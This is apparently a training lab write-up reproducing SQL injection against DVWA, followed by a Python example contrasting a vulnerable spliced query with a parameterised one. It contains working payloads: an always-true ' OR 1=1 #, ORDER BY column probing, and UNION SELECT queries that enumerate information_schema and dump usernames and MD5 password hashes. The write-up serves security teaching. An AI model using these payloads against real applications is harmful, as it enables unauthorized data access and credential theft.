This repository documents the step-by-step reproduction of a SQL Injection vulnerability using Damn Vulnerable Web Application (DVWA). The purpose of this lab was to understand how improperly validated user input can allow attackers to manipulate backend SQL queries and extract sensitive database information.
The objective of this lab was to:
- Identify the presence of a SQL Injection vulnerability
- Exploit the vulnerability to extract database information
- Understand how attackers can enumerate databases, tables, columns, and user credentials
- Observe the real-world risks posed by SQL Injection attacks
Tools used:
- Damn Vulnerable Web Application (DVWA)
- Web Browser
- Kali Linux
Lab environment:
- DVWA URL: http://10.6.6.13
- Login Credentials:
  - Username: admin
  - Password: password
- Security Level: Low
Setup steps:
- Log in to DVWA
- Click DVWA Security from the left menu
- Set security level to Low
- Click Submit
Navigate to SQL Injection from the left pane.
Payload used:
' OR 1=1 #
Observation: All user records were returned instead of a single user, confirming the application is vulnerable to SQL Injection.
Explanation: The single quote closes the string literal around the submitted id, OR 1=1 adds an always-true condition, and # comments out the remainder of the original query, so the database returns every row of the table.
To successfully use a UNION-based SQL injection, the number of columns in the original query must be known.
Payloads tested:
1' ORDER BY 1 #
1' ORDER BY 2 #
1' ORDER BY 3 #
Result:
- ORDER BY 1: successful
- ORDER BY 2: successful
- ORDER BY 3: Error: Unknown column '3' in 'order clause'
This confirms the original query selects two columns, so every UNION SELECT that follows must supply exactly two.
Payload used:
1' OR 1=1 UNION SELECT 1, VERSION()#
Result:
5.5.58-0+deb8u1
Finding:
DBMS: MySQL
Version: 5.5.58
OS: Debian 8 (jessie); the -0+deb8u1 suffix is the Debian package revision, so the server runs Debian's packaged build of MySQL rather than an upstream one
Payload used:
1' OR 1=1 UNION SELECT 1, DATABASE()#
Result:
dvwa
Finding: The database name is dvwa.
Payload used:
1' OR 1=1 UNION SELECT 1, table_name FROM information_schema.tables WHERE table_type='base table' AND table_schema='dvwa'#
Observation: Multiple table names were returned, including a table named users, which is likely to store credentials. MySQL records the type as 'BASE TABLE'; the lowercase comparison still matches because information_schema string columns use a case-insensitive collation.
Payload used:
1' OR 1=1 UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name='users'#
Observation: Column names discovered included user, password, first_name and last_name. Because this filter is on table_name only, columns from a users table in any other schema would be listed as well; adding AND table_schema='dvwa' keeps the result to the target database.
Important columns for exploitation: user and password.
Payload used:
1' OR 1=1 UNION SELECT user, password FROM users#
Result: Usernames and password hashes were successfully retrieved. DVWA stores these as unsalted MD5 hashes, so they can be cracked offline with a wordlist in seconds.
Finding: This demonstrates how attackers can steal credential data when SQL Injection vulnerabilities are not mitigated.
Findings:
- The application did not validate or sanitize user input
- SQL queries were built directly from user-supplied data
- Sensitive information could be extracted by an attacker:
  - Database name
  - Table names
  - Column names
  - User credentials
- The vulnerability exists due to insecure coding practices
SQL Injection vulnerabilities can lead to:
- Unauthorized data disclosure
- Credential theft
- Privilege escalation
- Complete database compromise
- Loss of user trust and legal consequences
This lab demonstrated how dangerous SQL Injection vulnerabilities can be when applications fail to properly validate user input. By exploiting a simple input field, it was possible to enumerate the entire database structure and retrieve sensitive user credentials.
Understanding this attack helps security professionals identify weaknesses and implement effective countermeasures such as prepared statements, input validation, and least-privilege database access.
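To make the countermeasure concrete, the following added example (written for this write-up, not DVWA's own PHP) places the vulnerable query construction used by the DVWA Low level beside a hardened version that validates the id and binds it as a parameter. It runs against an in-memory SQLite table built in the script with made-up rows; SQLite uses "--" for line comments where the lab's MySQL payloads used "#", so the payloads below end in "-- " instead. The stored hashes are unsalted MD5 because that is what DVWA stores.

```python
"""Vulnerable versus hardened lookup, mirroring DVWA's Low-level SQLi page.

Added example, not DVWA code. Runs on an in-memory SQLite table constructed
here (assumption: the rows are made up; hashes are unsalted MD5 like DVWA's).
SQLite line comments are '--', so the lab's '#' payloads are written '-- '.
"""
import hashlib
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Create a users table shaped like DVWA's with three constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    sample = [
        (1, "admin", "admin", "admin", "password"),
        (2, "Gordon", "Brown", "gordonb", "abc123"),
        (3, "Hack", "Me", "1337", "charley"),
    ]
    for uid, first, last, user, pw in sample:
        conn.execute(
            "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
            (uid, first, last, user, hashlib.md5(pw.encode()).hexdigest()),
        )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """DVWA Low pattern: the request value is spliced into the SQL text.

    The quote in a payload closes the literal and everything after it is
    parsed as SQL, which is exactly what the lab's payloads rely on.
    """
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def probe_columns(conn: sqlite3.Connection, limit: int = 10) -> int:
    """The lab's ORDER BY probe: the first n that errors means n-1 columns."""
    for n in range(1, limit + 1):
        try:
            lookup_vulnerable(conn, f"1' ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError(f"no ORDER BY error up to {limit}")


def lookup_bound_only(conn: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """Parameter binding alone: the payload is compared as one literal value,
    never parsed as SQL, so an injection attempt simply matches nothing."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """Hardened form: reject anything that is not a whole number, then bind.

    Validation gives the caller a clear error for junk input; binding is what
    actually prevents the injection.
    """
    if not user_id.isdigit():
        raise ValueError(f"user_id must be numeric, got {user_id!r}")
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (int(user_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("tautology:", lookup_vulnerable(db, "1' OR 1=1 -- "))
    print("columns:", probe_columns(db))
    print("dump:", lookup_vulnerable(db, "x' UNION SELECT user, password FROM users -- "))
    print("bound only:", lookup_bound_only(db, "1' OR 1=1 -- "))
    print("safe:", lookup_safe(db, "1"))
```

Running the script shows the three effects side by side: the tautology payload returns every row, the UNION payload returns user and hash pairs in the first_name and last_name slots, and the same payloads against the bound query return nothing because the database receives them as a single string value.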
Training Program: #parocyber